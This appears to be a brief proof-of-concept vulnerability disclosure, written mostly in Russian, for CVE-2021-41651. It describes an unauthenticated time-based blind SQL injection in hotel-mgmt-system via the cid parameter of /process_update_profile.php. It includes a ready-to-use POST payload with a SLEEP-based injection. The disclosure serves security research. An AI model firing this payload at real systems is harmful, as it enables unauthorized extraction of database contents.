
Эксплойт доказательства концепции для CVE-2021-41651, демонстрирующий неаутентифицированную временную слепую SQL-инъекцию в hotel-mgmt-system через параметр cid, что позволяет извлекать конфиденциальные данные из MySQL.
CVE-2021-41651 SQL-инъекция в hotel-mgmt-system
hotel-mgmt-system уязвим для неаутентифицированной атаки time-based blind SQL-инъекции.
Параметр cid на странице /process_update_profile.php не санирует пользовательский ввод, что позволяет злоумышленнику извлекать конфиденциальные данные из нижележащей базы данных MySQL.
URL: /process_update_profile.php
ПАРАМЕТР: cid
Parameter: cid ((custom) POST)
Type: time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
Payload: phone=123456778&cid=14 AND (SELECT 9048 FROM (SELECT(SLEEP(5)))zCfD)-- IKdVf&submitBtn=Update&fullName=James&[email protected]&newPassword=fasdfasdfasdfasdfasdf-

Jason Colyvas
MOBIUSBINARY
23 сентября 2021 года